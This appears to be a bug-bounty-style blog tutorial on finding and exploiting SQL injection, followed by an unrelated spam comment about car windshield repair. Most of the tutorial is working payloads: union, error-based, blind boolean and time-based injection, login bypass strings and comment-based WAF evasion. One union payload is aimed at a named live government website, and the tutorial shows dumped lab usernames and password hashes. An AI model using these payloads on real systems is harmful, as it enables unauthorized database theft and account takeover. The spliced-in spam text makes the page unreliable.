 |
| How to Hunt For SQL Injection learn Practically with background Concept |
Welcome Hunters,
SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible
Backgroung Concept About SQL Injection
* How SQL Injection works
➤ In order to run malicious SQl queries against a database server an attacker must first find an input within the web application that is included inside of an SQL query
➤ In order for an SQL Injection attack to take place the vulnerable website needs to directly include user input within an SQl statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server.
Note: All the process works in background in SQLI we try to retrieve data from the backend to gain credentials related to the target website.
Injection point For SQL Injection
➤ SQL Injection can be GET Based
➤ SQL Injection can be POST Based
➤ SQL Injection can be Header Based
➤ SQL Injection can be Cookie Based
Note: To execute your SQLI queries you have to find some input forum to execute the commands.
➤ SQL Injection GET based
The attacker has to attack through the URLS parameters to execute the commands.
Example- www.any.com/filename.programmning?parameter=value
➤ SQL Injection POST based
Attacker have to find any html forum that may execute sqli query.
Example: Signup form, login form, etc.
➤ SQL Injection HEADER based
In the process we have to execute the SQLI commands through the headers parameters in the target website as we have to look for –
Example: Referrer | User-Agent | Location | Host.
➤ SQL Injection Cookie Based
In this process we have to execute the command through with the COOKIE Parameters to accomplish our target. (We have to find the cookies from the web browser)
for this just visit on the any website and try to intercept request through Burp Suite and put backslash in the end of the cookie if you find any error in the response related to SQL the there may be SQL Injection.
Note: You can use single quote (') as well as double quote (") to break the sql statement
Example: Cookie: username:sdh@#$;
Now i hope you have an basic idea about what is SQl injection and how many types of SQL Injection are there.
And how to find SQl Injection Now we will see how to fix the query of sql statement because query fixing is the second step of SQL injection after find out the injection point.
Lets Continue,
Learn SQL Injection query Fixing
➤ Identify SQL Injection vulnerability
'
"
\
')
")
➤ Balance the query
http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select id ='id' where name ='xyz' {background}
How to fix
Basically you need to just put the -- + at the end of the vulnerable parameter after single quote or double quote to balance the query (that is used in the MySQl as a comment)
http://192.168.1.103/sqli-labs-master/Less-1/?id=1' --
select id ='1' -- ' where name ='xyz' {background}
In Background
select id=1 -- where name =xyz
how to fix query
http://192.168.1.103/sqli-labs-master/Less-2/?id=1 --
Find total no of vulnerable columns
Order by 1{same page }
Order by 2 {same page }
Order by n {different page }
There is n-1 columns are Present
http://192.168.1.103/sqli-labs-master/Less-1/?id=1' order by 1 --
Note:
➤ Order By: This is a keyword used in mysql to display the result of sorted columns
In a similar manners we can use "Group By" keyword to determine the number of columns in case the Order By keyword does not works or it is blacklisted by WAF (Web Application Firewall).
Find exact no of vulnerable columns out of these n-1
union all select 1,2,...n-1
Example:
union all select 1,2,3
select id=-1' union all select 1,2,3 -- where name =xyz
executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3 --
Execute any database sqli query there
On that reflected Number
Example: Database()
version()
user()
Executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),3 --
http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),user() --
--------------------------------------------------------------------------------------------------------------------------------------------
Situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sql injection.
http://192.168.1.103/sqli-labs-master/Less-5/?id=-1' --
error/double based sqli query -> hackbar->error/double->get database
--------------------------------------------------------------------------------------------------------------------------
Blind SQL Injection
Blind Boolean Based SQL Injection
and 1=1 {true }
and 1=2 {false }
and "a"="b"
and database()="xyz"
We can not assume the database
and sub string(database(),1,1)="a"
http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),1,1)="s" -- {true vale that means first character of first database is s}
http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),2,1)="e" -- {true second character of first database is e}
Blind Time Based SQL Injection
' and sleep(10) --
" and sleep(10) --
') and sleep(10) --
how to extract database for blind time based sqli
' and sleep(10) and 1=1 --
i gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()="security" -- its sleeping that’s means
http://192.168.1.103/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()="xyz" --
(Its not sleeping for 10 sec)
Exploitation of GET Based sqli
1. Database List -
hackbar->union->database->group_concat
information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195
2.Find tables of a database -dvwa
hackbar->union->tables->group_concat
guestbook
users
3. Find columns of a table - guestbook
comment_id
comment
name
4. Data of that columns
name,comment
hackbar->union->data->group_concat
name,"<------>",comment,"---->",third
Error Based Double Query Exploitaion
What about other Database for if want to fetch remaining database you have to increase first value of first limit
LIMIT 1,1 - challenges
LIMIT 2,1 - dvwa
LIMIT 3,1 - metasploit
tables
Default Tables
LIMIT 0,1 - guestbook
LIMIT 1,1 - users
LIMIT 2,1 -- you are not getting anything that means there is only two tables
columns for double query based
LIMIT 0,1 - user_id
LIMIT 1,1. --- first name
LIMIT 2,1)). --- last_name
LIMIT 3,1)). ---- user
LIMIT 4,1)). --- password
LIMIT 5,1)). -- avatar
LIMIT 0,1)). ---- nothing
Data of these columns
user password
admin 5f4dcc3b5aa765d61d8327deb882cf99
Gordon e99a18c428cb38d5f260853678922e03
1337 8d3533d75ae2c3966d7e0d4fcc69216b
Pablo
Post Based SQLI
Balance the query
' --
Problem is not working with post based instead of + use space ( ) or you can also use # to fix (#) is also used for comment out part of sqli query.
-- or #
Find total no of vulnerable columns
order by 1
find exact no of vulnerable columns
' union all select 1,2 #
Execute database query
' union all select database(),user() #
Less -12
") union all select 1,2 #
") union all select database(),user() #
Blind boolean post based SQL Injection
' OR 1=1 #
" OR 1=1 #
') OR 1=1 #
") OR 1=1 #
' OR database()="security" #
' OR sub string(database(),1,1)="a" #
' OR sub string(database(),1,1)="s" #
First character of database is s
' OR substring(database(),2,1)="e" #
Second character of database is e
Blind time based
' OR sleep(10) #
" OR sleep(10) #
') OR sleep(10) #
") OR sleep(10) # {worked}
") OR sleep(10) and 1=1 #
") OR sleep(10) and substring(database(),3,1)="a" #
application is sleeping when we fired this
") OR sleep(10) and substring(database(),3,1)="c" #
That means third character of database is c
Exploitation of POST Based SQLI
inject database query
1. Database list
hackbar -> union -> database-> group_concat
' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #
information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195
2. Find table of a database - security
' union all select (SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479),2 #
E-Mails
referrersuser-agents
users
3. Find columns of a table - users
hackbar->union->columns->group_concat
' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #
user_id
first_name
last_name
user
password
avatar
id
username
password
4. Data of these columns - user, password
user,"<----->“, password
' union all select 1,(SELECT GROUP_CONCAT(username,"<----->",password SEPARATOR 0x3c62723e) FROM security.users) #
Error Based Double Query Exploitation Post Method
') AND(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 3,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #
Cookie Based SQLI
target - testphp.vulnweb.com
Balance Query
' --
' and 'x'='x
select login='test/test' and 'x'='x ' where something other part of query
-------------------------------------------
Header Based sqli
Balance Query
' --
' and 'a'='a
select referrer='value ' OR SLEEP(5) and 'a'='a ' something other part of query
-------------------------------------------
WAF-Web application firewall by passing
Earlier i tried
' order by 1 --+
When I tried
' union all select 1,2,3,4,5,6,7 --+
I got not acceptable error
Either union may be illegal keyword may be all will be illegal input select
illegal word (word)= /*!12345word*/
' /*!12345union*/ all select 1,2,3 --+
http://multan.gov.pk/page.php?data=-2' /*!12345union*/ all select 1,2,database(),4,5,6,7 --+
Now exploit this
all database list
hackbar->union->database->group_concat
on any reflect no
(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)
' /*!12345union*/ all select 1,2,(SELECT+/*!12345GROUP_CONCAT*/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 --+
Authentication Bypassing through SQLI
Let’s assume background of login page
select username ='value1'&password='value2' where some other part of query
value1 = ' OR 1=1 --
select username ='' OR 1=1 -- '&password='value2' where some other part of query
value1= 1' OR '1'='1
select username ='1' OR '1'='1 '&password='value2' where some other part of query
So guys this was all about SQl Injection which the most critical vulnerability in these days in the web applications.
I hope this would be helpful for you guys to hunt more quickly if you find any grammar error please let me know in the comment box as well as you can send it on the mail attached in the author section.
Thank you happy Hunting
Resource from Hunter 1.0: Vikash Chaudhary
Car glass repair is something that most car owners will need at some point in their vehicle's life. Windshields are an essential component of a car and are crucial to a driver's safety on the road. In this blog post, we will discuss why car glass repair is important, how to identify damage, and what to do if you need repairs.
ReplyDeleteImportance of Car Glass Repair
The windshield of a car serves several purposes, including protecting drivers and passengers from the elements and providing structural support to the vehicle. A damaged windshield can compromise the safety of the vehicle and its occupants. In the event of an accident, a damaged windshield may not be able to provide adequate protection, leading to more severe injuries.
Identifying Damage
There are several ways to identify damage to a windshield. Chips and cracks are the most common types of damage. Chips are small dents on the windshield caused by rocks or other debris. They are usually small and do not require the windshield to be replaced. Cracks, on the other hand, are more severe and can spread across the windshield if not repaired in a timely manner. Scratches are also a common type of damage, but they are usually minor and do not require repair.
What to Do if You Need Repairs
If you notice any damage to your windshield, it is essential to take action immediately. Even small chips and cracks can quickly become larger and more dangerous. In some cases, small chips can be repaired with a resin injection. However, more significant damage may require a full windshield replacement. It is always best to seek professional help when it comes to car glass repair.
Final Thoughts
Car glass repair is a vital aspect of vehicle maintenance that should not be ignored. Any damage to the windshield can compromise the safety of the vehicle and its occupants. If you notice any chips, cracks, or scratches on your windshield, seek professional help immediately. By taking care of your windshield, you can ensure safe driving and prevent more significant damages in the long run.